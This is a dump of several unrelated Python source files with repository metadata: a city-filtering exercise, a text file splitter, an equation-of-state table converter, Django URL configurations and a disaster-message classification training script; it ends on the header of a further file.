Sem-09-T1-Q5.py
|
daianasousa/Semana-09
|
decfc9b47931ae4f5a4f30a0d26b931ecd548f59
|
[
"MIT"
] | null | null | null |
def carrega_cidades():
resultado = []
with open('cidades.csv', 'r', encoding='utf-8') as arquivo:
for linha in arquivo:
uf, ibge, nome, dia, mes, pop = linha.split(';')
resultado.append(
(uf, int(ibge), nome, int(dia), int(mes), int(pop))
)
    return resultado
def main():
mes = int(input('Mês: '))
populacao = int(input('População: '))
cidades = carrega_cidades()
meses = ('JANEIRO', 'FEVEREIRO' ,'MARÇO' ,'ABRIL' ,'MAIO' ,'JUNHO' ,'JULHO' ,'AGOSTO' ,'SETEMBRO' , 'OUTUBRO', 'NOVEMBRO', 'DEZEMBRO')
    print(f'CIDADES COM MAIS DE {populacao} HABITANTES E ANIVERSÁRIO EM {meses[mes-1]}:')
for dados in cidades:
if dados[-1] > populacao and dados[-2] == mes:
nome = dados[2]
dia = dados[3]
uf = dados[0]
pop = dados[-1]
print(f'{nome}({uf}) tem {pop} habitantes e faz aniversário em {dia} de {meses[mes-1].lower()}.')
if __name__ == '__main__':
main()
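# Editor's note (not part of the original script): carrega_cidades assumes each line of
# cidades.csv holds six semicolon-separated fields, UF;IBGE;name;day;month;population.
# A hypothetical line such as
#     XX;1234567;Cidade Exemplo;15;3;500000
# would be parsed into the tuple ('XX', 1234567, 'Cidade Exemplo', 15, 3, 500000).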
| 30.885714
| 138
| 0.543941
| 134
| 1,081
| 4.313433
| 0.507463
| 0.048443
| 0.031142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01423
| 0.284921
| 1,081
| 35
| 139
| 30.885714
| 0.733506
| 0
| 0
| 0
| 0
| 0.037037
| 0.259704
| 0.021257
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0
| 0
| 0.111111
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f3a8ec38dd614e2783df50d617c5b8f3ca8b0f8
| 1,428
|
py
|
Python
|
data_split.py
|
CodeDogandCat/ChineseGrammarErrorDiagnose
|
4e1ec745ae938f742c6afb0e88b08ea50c6028cb
|
[
"Apache-2.0"
] | null | null | null |
data_split.py
|
CodeDogandCat/ChineseGrammarErrorDiagnose
|
4e1ec745ae938f742c6afb0e88b08ea50c6028cb
|
[
"Apache-2.0"
] | null | null | null |
data_split.py
|
CodeDogandCat/ChineseGrammarErrorDiagnose
|
4e1ec745ae938f742c6afb0e88b08ea50c6028cb
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import re
# from pyltp import Segmentor
import jieba.posseg as pseg
import jieba
import os
import sys
import json
import math
# import kenlm
import nltk
from collections import Counter
def dataSplit(inputpath, count):
(filepath, tempfilename) = os.path.split(inputpath)
(filename, extension) = os.path.splitext(tempfilename)
outputlist = []
for i in range(count):
outputpath = os.path.join('./word/', filename + "_" + str(i) + extension)
print(outputpath)
outputlist.append(outputpath)
outputfiles = []
for path in outputlist:
output = open(path, encoding='utf-8', mode='w+')
outputfiles.append(output)
print('open input')
fin = open(inputpath, encoding='utf-8')
print('read input')
    lines = fin.readlines()  # read all lines of the input file at once
print('calculate lines')
total = len(lines)
    slice_size = math.floor(total / count)
    i = 0
    while i < count - 1:
        print("write file " + str(i))
        outputfiles[i].writelines(lines[i * slice_size:(i + 1) * slice_size])
        outputfiles[i].close()
        print("write file " + str(i) + " is ok~~ ")
        i += 1
    print("write file " + str(i))
    outputfiles[i].writelines(lines[i * slice_size:])
outputfiles[i].close()
print("write file " + str(i) + " is ok~~ ")
print("all is ok~~")
# dataSplit('TNewsSegafter2.txt', 32)
dataSplit('TNewsSegafter1.txt', 32)
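# Editor's note (not part of the original script): dataSplit writes `count` files under
# ./word/, each holding floor(total / count) lines, with the final file also receiving
# the remainder. For example, 100 input lines with count=32 yield 31 files of 3 lines
# and one last file of 7 lines. The input filename above comes from the original code.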
| 28
| 81
| 0.621148
| 178
| 1,428
| 4.977528
| 0.421348
| 0.022573
| 0.063205
| 0.076749
| 0.214447
| 0.214447
| 0.214447
| 0.214447
| 0.214447
| 0.214447
| 0
| 0.01184
| 0.231092
| 1,428
| 50
| 82
| 28.56
| 0.795082
| 0.081933
| 0
| 0.146341
| 0
| 0
| 0.111877
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.219512
| 0
| 0.243902
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f3df5f78e78d0ee2fc42ec4cf3a85208b508f67
| 7,178
|
py
|
Python
|
eos/old_scott_ANEOS_conversion.py
|
ScottHull/FDPS_SPH
|
6db11d599d433f889da100e78c17d6f65365ceda
|
[
"MIT"
] | null | null | null |
eos/old_scott_ANEOS_conversion.py
|
ScottHull/FDPS_SPH
|
6db11d599d433f889da100e78c17d6f65365ceda
|
[
"MIT"
] | null | null | null |
eos/old_scott_ANEOS_conversion.py
|
ScottHull/FDPS_SPH
|
6db11d599d433f889da100e78c17d6f65365ceda
|
[
"MIT"
] | null | null | null |
"""
This is a python script that converts u(rho, T), P(rho, T), Cs(rho,T), S(rho, T)
to T(rho, u), P(rho, u), Cs(rho, u), S(rho, u), which is more useful for SPH calculations
"""
import matplotlib.pyplot as plt
from collections import OrderedDict
import numpy as np
import pandas as pd
import csv
import sys
from scipy.interpolate import interp1d
from scipy import interpolate
def emptyLineIndices(f):
empty_lines = [0]
with open(f, 'r') as infile:
reader = csv.reader(infile)
next(reader) # drop header row
for index, row in enumerate(reader):
if len(row) == 0:
empty_lines.append(index)
infile.close()
return empty_lines
def chunkFile(f, empty_lines):
densities = []
d = {}
with open(f, 'r') as infile:
reader = csv.reader(infile)
headers = next(reader)
reader = list(reader)
for index, line in enumerate(empty_lines):
temp_dict = {}
for i in headers:
temp_dict.update({i: []})
            if (index + 1) != len(empty_lines):
                start, end = empty_lines[index] + 1, empty_lines[index + 1] - 1
                trimmed_reader = reader[start:end]
for row in trimmed_reader:
for index2, i in enumerate(row):
header = headers[index2]
temp_dict[header].append(reformat(i))
density = reformat(temp_dict['Pressure (Pa)'][0])
densities.append(density)
d.update({density: temp_dict})
return d
def reformat(number):
if isinstance(number, str):
if '-101' in str(number):
new_num = float(number.split('-')[0]) * (10**(-101))
return new_num
else:
return float(number)
else:
return number
def recalculateEnergies(d, grid_number, min_energy, delta):
"""
For each density sample, we want the same exponential energy grid
:param d:
:param grid_number:
:param min_energy:
:param delta:
:return:
"""
densities = d.keys()
new_energies = []
for i in range(0, grid_number):
new_energy = min_energy * (delta**i)
new_energies.append(new_energy)
for i in densities:
d[i].update({'Energy (J/kg)': new_energies})
return d
nu = 120  # number of grid points for the internal energy (exponential grid)
infile_path = 'granite.table.csv'
empty_lines = emptyLineIndices(f=infile_path)
sorted_dict = chunkFile(f=infile_path, empty_lines=empty_lines)
densities = sorted_dict.keys()
infile_df = pd.read_csv(infile_path)
energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
min_energy = min(energy)
max_energy = max(energy)
delta = (min_energy / max_energy)**(1/(nu-1))
sorted_dict = recalculateEnergies(d=sorted_dict, grid_number=nu, min_energy=min_energy, delta=delta)
for i in densities:
energies = sorted_dict[i]['Energy (J/kg)']
temperatures = sorted_dict[i]['Temperature (K)']
pressures = sorted_dict[i]['Pressure (Pa)']
sound_speeds = sorted_dict[i]['Sound speed (m/s)']
entropies = sorted_dict[i]['Entropy (J/kg/K)']
f_temperature = interpolate.interp1d(energies, temperatures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Temperature (K)': f_temperature(energies)})
f_pressure = interpolate.interp1d(temperatures, pressures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Pressure (Pa)': f_pressure(sorted_dict[i]['Temperature (K)'])})
f_soundspeed = interpolate.interp1d(temperatures, sound_speeds, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Sound speed (m/s)': f_soundspeed(sorted_dict[i]['Temperature (K)'])})
f_entropy = interpolate.interp1d(temperatures, entropies, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Entropy (J/kg/K)': f_entropy(sorted_dict[i]['Temperature (K)'])})
# infile_df = pd.read_csv(infile_path)
#
# density = sorted(list(set([reformat(i) for i in list(infile_df['Density (kg/m3)'])]))) # remove duplicates, then sort
# temperature = sorted(list(set([reformat(i) for i in list(infile_df['Temperature (K)'])])))
# energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
# pressure = [reformat(i) for i in list(infile_df['Pressure (Pa)'])]
# sound_speed = [reformat(i) for i in list(infile_df['Sound speed (m/s)'])]
# entropy = [reformat(i) for i in list(infile_df['Entropy (J/kg/K)'])]
#
# min_energy = min(energy)
# max_energy = max(energy)
# delta = (min_energy / max_energy)**(1 / (nu - 1))
#
# new_energy = [min_energy * (delta**i) for i in range(0, nu)]
#
# new_temperature = []
# new_pressure = []
# new_sound_speed = []
# new_entropy = []
#
# for m in range(0, nu):
#
# # internal energy
# f_temperature = interpolate.interp1d(energy[m:], temperature[m:], kind='linear', fill_value='extrapolate')
# new_temperature.append(f_temperature(new_energy))
#
# # pressure
# f_pressure = interpolate.interp1d(temperature[m:], pressure[m:], kind='linear', fill_value='extrapolate')
# new_pressure.append(f_pressure(new_temperature[m]))
#
# # sound speed
# f_soundspeed = interpolate.interp1d(temperature[m:], sound_speed[m:], kind='linear', fill_value='extrapolate')
# new_sound_speed.append(f_soundspeed(new_temperature[m]))
#
# # entropy
# f_entropy = interpolate.interp1d(temperature[m:], entropy[m:], kind='linear', fill_value='extrapolate')
# new_entropy.append(f_entropy(new_temperature[m]))
#
# new_temperature = np.array(new_temperature)
# new_pressure = np.array(new_pressure)
# new_sound_speed = np.array(new_sound_speed)
# new_entropy = np.array(new_entropy)
#
# for m in range(0, len(density), int(len(density)/6)):
#
# ax = [0, 0, 0, 0]
#
# fig = plt.figure(figsize = (10,6.128))
#
# ax[0] = fig.add_subplot(221)
# ax[1] = fig.add_subplot(222)
# ax[2] = fig.add_subplot(223)
# ax[3] = fig.add_subplot(224)
#
# ax[0].semilogy(np.array(temperature) * 1e-3, np.array(energy[m:]) * 1e-6, '--', label="original ANEOS")
# ax[0].semilogy(new_temperature[m:] * 1e-3, np.array(new_energy[m:]) * 1e-6, '-.', label="modified")
# ax[1].semilogy(np.array(temperature) * 1e-3, np.array(pressure[m:]) * 1e-6,'--', new_temperature[m:] * 1e-3, new_pressure[m:] * 1e-6,'-.')
# ax[2].plot(np.array(temperature) * 1e-3, np.array(sound_speed[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_sound_speed[m:] * 1e-3,'-.')
# ax[3].plot(np.array(temperature) * 1e-3, np.array(entropy[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_entropy[m:] * 1e-3,'-.')
#
# ax[0].legend(frameon=False)
#
# ax[0].set_ylabel('Energy (MJ/kg)', fontsize=10)
# ax[1].set_ylabel('Pressure (MPa)', fontsize=10)
# ax[2].set_ylabel('Sound Speed (km/s)', fontsize=10)
# ax[3].set_ylabel('Entropy (kJ/K/kg)', fontsize=10)
# ax[2].set_xlabel('Temperature ($10^3$ K)', fontsize=10)
# ax[3].set_xlabel('Temperature ($10^3$ K)',fontsize=10)
#
# fig.suptitle("Density: %3.3f kg/m$^3$" %(density[m]))
# # plt.show()
# # fig.savefig("Density" + str(m) + ".png")
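# Editor's note (not part of the original script): `reformat` appears to exist because
# the exported ANEOS table can drop the exponent marker for very small values, e.g.
# "1.234-101" instead of "1.234E-101". Quick checks of the helper on hypothetical inputs:
#     reformat("1.234-101")  ->  1.234e-101
#     reformat("5.0")        ->  5.0
#     reformat(3)            ->  3   (non-strings pass through unchanged)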
| 34.344498
| 146
| 0.636389
| 1,013
| 7,178
| 4.363277
| 0.174729
| 0.036199
| 0.01629
| 0.01267
| 0.345475
| 0.280995
| 0.254525
| 0.201584
| 0.137104
| 0.083258
| 0
| 0.022692
| 0.195737
| 7,178
| 208
| 147
| 34.509615
| 0.742941
| 0.478406
| 0
| 0.120482
| 0
| 0
| 0.085888
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048193
| false
| 0
| 0.096386
| 0
| 0.216867
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f3f44af77a5d9949e7fe7c6858624af3b7fa923
| 346
|
py
|
Python
|
scheduler/post_scheduler/urls.py
|
Awinja-j/Social-Media-post-Scheduler
|
4f95b4bb2ca3f890d3e22bcda859b94ebc483b87
|
[
"MIT"
] | 1
|
2021-05-08T08:21:06.000Z
|
2021-05-08T08:21:06.000Z
|
scheduler/post_scheduler/urls.py
|
Awinja-j/Social-Media-post-Scheduler
|
4f95b4bb2ca3f890d3e22bcda859b94ebc483b87
|
[
"MIT"
] | null | null | null |
scheduler/post_scheduler/urls.py
|
Awinja-j/Social-Media-post-Scheduler
|
4f95b4bb2ca3f890d3e22bcda859b94ebc483b87
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('post_posts', views.post_posts),
path('fetch_posts', views.get_posts),
path('fetch_post/<pk>', views.get_post),
path('delete_post/<pk>', views.delete_post),
path('edit_post/<pk>', views.edit_post),
path('search_for_a_post', views.search_for_a_post)
]
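# Editor's sketch (assumed, not part of this app): these routes would typically be
# mounted from the project-level urls.py; the 'api/' prefix below is hypothetical.
#
#     from django.urls import include, path
#     urlpatterns = [path('api/', include('post_scheduler.urls'))]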
| 28.833333
| 54
| 0.699422
| 52
| 346
| 4.346154
| 0.326923
| 0.079646
| 0.146018
| 0.123894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141619
| 346
| 12
| 55
| 28.833333
| 0.760943
| 0
| 0
| 0
| 0
| 0
| 0.239193
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f43a06d91c00b879b94bd9ca11de4d7d8fcab07
| 377
|
py
|
Python
|
full-stack/backend/django-app/django-jwt-app/settings/urls.py
|
mp5maker/library
|
b4d2eea70ae0da9d917285569031edfb4d8ab9fc
|
[
"MIT"
] | null | null | null |
full-stack/backend/django-app/django-jwt-app/settings/urls.py
|
mp5maker/library
|
b4d2eea70ae0da9d917285569031edfb4d8ab9fc
|
[
"MIT"
] | 23
|
2020-08-15T15:18:32.000Z
|
2022-02-26T13:49:05.000Z
|
full-stack/backend/django-app/django-jwt-app/settings/urls.py
|
mp5maker/library
|
b4d2eea70ae0da9d917285569031edfb4d8ab9fc
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path, include
from rest_framework_jwt.views import (
obtain_jwt_token,
refresh_jwt_token,
)
urlpatterns = [
path('admin/', admin.site.urls),
path('token-auth/', obtain_jwt_token),
path('token-refresh/', refresh_jwt_token),
path('employee/', include('employee.urls', namespace='employee'))
]
| 22.176471
| 70
| 0.710875
| 48
| 377
| 5.375
| 0.416667
| 0.124031
| 0.108527
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 377
| 16
| 71
| 23.5625
| 0.808777
| 0
| 0
| 0
| 0
| 0
| 0.161804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f45037068a6ca19658fc2ba430b609e4386fc29
| 15,989
|
py
|
Python
|
models/train_classifier.py
|
tarcisobraz/disaster-message-clf
|
22de03350a0f993005564a1d07a43da6bd989e67
|
[
"DOC"
] | null | null | null |
models/train_classifier.py
|
tarcisobraz/disaster-message-clf
|
22de03350a0f993005564a1d07a43da6bd989e67
|
[
"DOC"
] | null | null | null |
models/train_classifier.py
|
tarcisobraz/disaster-message-clf
|
22de03350a0f993005564a1d07a43da6bd989e67
|
[
"DOC"
] | null | null | null |
#General libs
import sys
import os
import json
from datetime import datetime
import time
#Data wrangling libs
import pandas as pd
import numpy as np
#DB related libs
from sqlalchemy import create_engine
#ML models related libs
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import LogisticRegression
#Gensim
from gensim.models import KeyedVectors
#Custom Transformers and Estimators
import nlp_estimators
#Model Saver
import dill
#Workspace Utils
from workspace_utils import active_session
#Glove Models dictionary (to be filled in when needed)
glove_models_by_size = {50: None,
100: None,
300: None}
#Train Configurations to be filled in when script is called
train_configs = {}
def get_or_load_glove_model(num_dims):
'''
INPUT
num_dims - int, number of dimensions of the Glove model to be loaded
OUTPUT
glove_model - object, the pre-trained glove model with the specified number of dimensions
This function either retrieves the already-stored glove model or loads and
stores it from file using the train configuration `glove_models_folderpath`
'''
    if glove_models_by_size[num_dims] is None:
print('Pre-trained Glove Model with {} dims not found. '\
'\nLoading it from file...'.format(num_dims))
glove_models_by_size[num_dims] = KeyedVectors.load_word2vec_format(
os.path.join(train_configs['glove_models_folderpath'],
'glove.6B.{}d_word2vec.txt'.format(num_dims)),
binary=False)
return glove_models_by_size[num_dims]
def load_data(database_filepath):
'''
INPUT
database_filepath - string, filepath of database from which data will be loaded
OUTPUT
X - numpy array, The raw messages ready to be used to train the pipelines
X_tokenized - numpy array, The tokenized messages ready to be used to train the pipelines
Y - numpy array, The list of categories to which each message belongs
category_columns - pandas series, The names of the categories
categories_tokens - numpy array, The tokenized categories names (to be used by cats_sim feature set)
This function loads and prepares data for the models training
'''
engine = create_engine('sqlite:///' + database_filepath)
messages_df = pd.read_sql_table(con=engine, table_name='Message')
categories_df = pd.read_sql_table(con=engine, table_name='CorpusWide')
messages_tokens = pd.read_sql_table(con=engine, table_name='MessageTokens')
X = messages_df.message.values
X_tokenized = messages_tokens.tokens_str.values
Y_df = categories_df.drop(['message_id', 'message', 'original', 'genre'], axis=1)
Y = Y_df.values
category_columns = Y_df.columns
categories_tokens = np.array([np.array(cat.split('_')) for cat in category_columns])
return X, X_tokenized, Y, category_columns, categories_tokens
def build_estimator_obj(estimator_code):
'''
INPUT
estimator_code - string, the code of the classifier object to be built
OUTPUT
classifier_obj - sklearn estimator, the built classifier object
This function builds a classifier object based on the estimator code received as input.
For unexpected codes, it prints an error and exits the script execution
'''
classifier_obj = None
if estimator_code == 'rf':
classifier_obj = RandomForestClassifier()
elif estimator_code == 'lr':
classifier_obj = LogisticRegression()
else:
print("Invalid Classifier Estimator Code " + estimator_code)
exit(1)
return classifier_obj
def build_classifiers_build_params(classifiers_configs):
'''
INPUT
classifiers_configs - dict, a dictionary containing the configuration for each classifier
OUTPUT
classifiers_params_dict - dict, a dictionary containing the grid params to be used for
each classifier in the training process
This function builds a dictionary with grid params to be used in training process for each
classifier whose configurations were given as input.
It can handle a single classifier or a list of classifiers.
'''
if len(classifiers_configs) > 1:
classifiers_params_list = []
classifiers_params_dict = {}
for classifier in classifiers_configs:
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj.set_params(**classifier['params']))
classifiers_params_list.append(classifier_obj)
classifiers_params_dict['clf'] = classifiers_params_list
elif len(classifiers_configs) == 1:
classifier = classifiers_configs[0]
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj)
classifiers_params_dict = {'clf' : [classifier_obj]}
classifiers_params_dict.update(classifier['params'])
print(classifiers_params_dict)
return classifiers_params_dict
def build_model(model_config,classifiers_params,categories_tokens):
'''
INPUT
model_config - dict, a dictionary containing the configuration for a model pipeline
classifiers_configs - dict, a dictionary containing the configuration for each classifier
categories_tokens - numpy array, array containing the tokenized categories names
OUTPUT
grid_search_cv - sklearn GridSearchCV, a grid search CV object containing specifications
on how to train the model based on the input configs
This function builds a Grid Search CV object with specifications for training process for a
given model and its classifiers whose configurations were given as input.
It can handle different feature_sets:
- Local Word2Vec
- Pre-Trained Glove
- Doc2Vec
- Category Similarity
- All Features Sets together
'''
feature_set = model_config['feature_set']
print("Building Model for feature set: {}".format(feature_set))
print("Grid Params: {}".format(model_config['grid_params']))
pipeline = grid_search_params = grid_search_cv = None
jobs = -1
score = 'f1_micro'
def_cv = 3
verbosity_level=10
if feature_set == 'local_w2v':
pipeline = Pipeline([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'glove':
pipeline = Pipeline([
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50))),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'glove__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['glove__num_dims']]}
elif feature_set == 'doc2vec':
pipeline = Pipeline([
('doc2vec', nlp_estimators.Doc2VecTransformer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'cats_sim':
pipeline = Pipeline([
('cats_sim', nlp_estimators.CategoriesSimilarity(
categories_tokens=categories_tokens)),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'cats_sim__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['cats_sim__num_dims']]}
elif feature_set == 'all_feats':
pipeline = Pipeline([
('features', FeatureUnion([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer(num_dims=50)),
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50)
)),
('doc2vec', nlp_estimators.Doc2VecTransformer(vector_size=50)),
('cats_sim', nlp_estimators.CategoriesSimilarity(categories_tokens=categories_tokens,
word2vec_model=get_or_load_glove_model(50)))
])),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
else:
print("Error: Invalid Feature Set: " + feature_set)
sys.exit(1)
# Adds classifiers params to grid params
grid_search_params.update(classifiers_params)
grid_search_cv = GridSearchCV(estimator=pipeline,
param_grid=grid_search_params,
scoring=score,
cv=def_cv,
n_jobs=jobs,
verbose=verbosity_level)
return grid_search_cv
def evaluate_model(model, X_test, Y_test, category_names):
'''
INPUT
model - sklearn GridSearchCV, the GridSearch containing the model with best performance on the training set
X_test - numpy array, tokenized messages ready to be used to test the fit pipelines
Y_test - numpy array, array containing the tokenized categories names for the test set
category_names - pandas series, the categories names
OUTPUT
test_score - float, the score of the input model on the test data
This function runs the model with best performance on the training set on the test dataset,
printing the precision, recall and f-1 per category and returning the overall prediction score.
'''
print('Best params: %s' % model.best_params_)
# Best training data accuracy
print('Best training score: %.3f' % model.best_score_)
# Predict on test data with best params
Y_pred = model.predict(X_test)
test_score = model.score(X_test, Y_test)
# Test data accuracy of model with best params
print('Test set score for best params: %.3f ' % test_score)
for category_idx in range(len(category_names)):
print(classification_report(y_pred=Y_pred[:,category_idx],
y_true=Y_test[:,category_idx],
labels=[0,1],
target_names=[category_names[category_idx] + '-0',
category_names[category_idx] + '-1']))
return test_score
def save_model(model, model_filepath):
'''
INPUT
model - sklearn Estimator, the model with best performance on the training set
model_filepath - string, path where model picke will be saved
This function saves the model with best performance on the training set to a given filepath.
'''
# Output a pickle file for the model
with open(model_filepath,'wb') as f:
dill.dump(model, f)
def build_grid_search_results_df(gs_results, gs_name, test_score):
'''
INPUT
gs_results - dict, dictionary containing the results of GridSearchCV training
gs_name - string, the name of the GridSearchCV feature set
test_score - float, the score of the best performing model of the GridSearchCV on the test set
OUTPUT
gs_results_df - pandas DataFrame, a dataframe holding information of the GridSearchCV results
(train and test) for record
This function builds a dataframe with information of the GridSearchCV results
(train and test) for record.
'''
gs_results_df = pd.DataFrame(gs_results)
gs_results_df['grid_id'] = gs_name
gs_results_df['best_model_test_score'] = test_score
gs_results_df['param_set_order'] = np.arange(len(gs_results_df))
return gs_results_df
def run_grid_search():
'''
This function runs the whole model selection phase:
- Load Data from DB
- Build Model
- Run GridSearch
- Save results to file
- Save best model pickle file
'''
start = time.time()
print("Train configuration:")
print(json.dumps(train_configs, indent=4))
print('Loading data...\n DATABASE: {}'.format(train_configs['database_filepath']))
X, X_tokenized, Y, category_names, categories_tokens = load_data(train_configs['database_filepath'])
X_train, X_test, Y_train, Y_test = train_test_split(X_tokenized, Y, test_size=0.25)
classifiers_params = build_classifiers_build_params(train_configs['classifiers'])
print('Running GridSearch on models parameters...')
best_score = 0.0
best_gs = ''
overall_results_df = pd.DataFrame()
for model_config in train_configs['models']:
print('Building model...')
model = build_model(model_config,
classifiers_params,
categories_tokens)
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
test_score = evaluate_model(model, X_test, Y_test, category_names)
gs_results_df = build_grid_search_results_df(model.cv_results_,
model_config['feature_set'],
test_score)
overall_results_df = pd.concat([overall_results_df, gs_results_df])
print('Saving model...\n MODEL: {}'.format(
model_config['model_ouput_filepath']))
save_model(model.best_estimator_, model_config['model_ouput_filepath'])
print('Trained model saved!')
# Track best (highest test accuracy) model
if test_score > best_score:
best_score = test_score
best_gs = model_config['feature_set']
output_filepath = train_configs['results_folderpath'] + \
'res-' + train_configs['name'] + '-' + \
datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + \
'.csv'
print('Saving Results...\n FILEPATH: {}'.format(output_filepath))
overall_results_df.to_csv(output_filepath, index=False)
print('\nClassifier with best test set accuracy: %s' % best_gs)
end = time.time()
print("Training Time: " + str(int(end - start)) + "s")
def main():
    if len(sys.argv) >= 3:
        train_config_filepath, using_udacity_workspace = sys.argv[1:3]
# Read train config from file
with open(train_config_filepath, 'r') as f:
global train_configs
train_configs = json.load(f)
        if int(using_udacity_workspace) == 1:
with active_session():
run_grid_search()
else:
run_grid_search()
else:
print('Please provide the filepath of train configuration file and '\
' whether or not you are using udacity workspace (0,1) \n\n'\
'Example running local: python train_classifier.py configs/train_config_simple.json 0'\
'\nExample running at Udacity: python train_classifier.py configs/train_config_simple.json 1')
if __name__ == '__main__':
main()
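# Editor's sketch (not part of the original script): judging from the keys read above,
# a minimal train configuration JSON would look roughly like the hypothetical example
# below (paths and parameter values are made up; the 'model_ouput_filepath' spelling
# matches the key actually used in the code):
#
#     {
#       "name": "simple",
#       "database_filepath": "data/DisasterResponse.db",
#       "glove_models_folderpath": "glove/",
#       "results_folderpath": "results/",
#       "classifiers": [{"estimator": "rf", "params": {}}],
#       "models": [{"feature_set": "local_w2v",
#                   "grid_params": {},
#                   "model_ouput_filepath": "models/classifier.pkl"}]
#     }
#
# Example invocation (as stated in the usage message above):
#     python train_classifier.py configs/train_config_simple.json 0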
| 37.888626
| 117
| 0.659704
| 1,896
| 15,989
| 5.327532
| 0.179852
| 0.01881
| 0.009801
| 0.008316
| 0.306108
| 0.244431
| 0.226314
| 0.208692
| 0.184536
| 0.111276
| 0
| 0.005528
| 0.264557
| 15,989
| 421
| 118
| 37.978622
| 0.853474
| 0.272625
| 0
| 0.144144
| 0
| 0
| 0.135254
| 0.015976
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045045
| false
| 0
| 0.103604
| 0
| 0.18018
| 0.103604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f501af017d1618fd9d8ac7f58bef0af07c22038
| 2,757
|
py
|
Python
|
MLP/Detectar cancer de mama/Cancer_mama_simples.py
|
alex7alves/Deep-Learning
|
7843629d5367f3ea8b15915a7ba3667cf7a65587
|
[
"Apache-2.0"
] | null | null | null |
MLP/Detectar cancer de mama/Cancer_mama_simples.py
|
alex7alves/Deep-Learning
|
7843629d5367f3ea8b15915a7ba3667cf7a65587
|
[
"Apache-2.0"
] | null | null | null |
MLP/Detectar cancer de mama/Cancer_mama_simples.py
|
alex7alves/Deep-Learning
|
7843629d5367f3ea8b15915a7ba3667cf7a65587
|
[
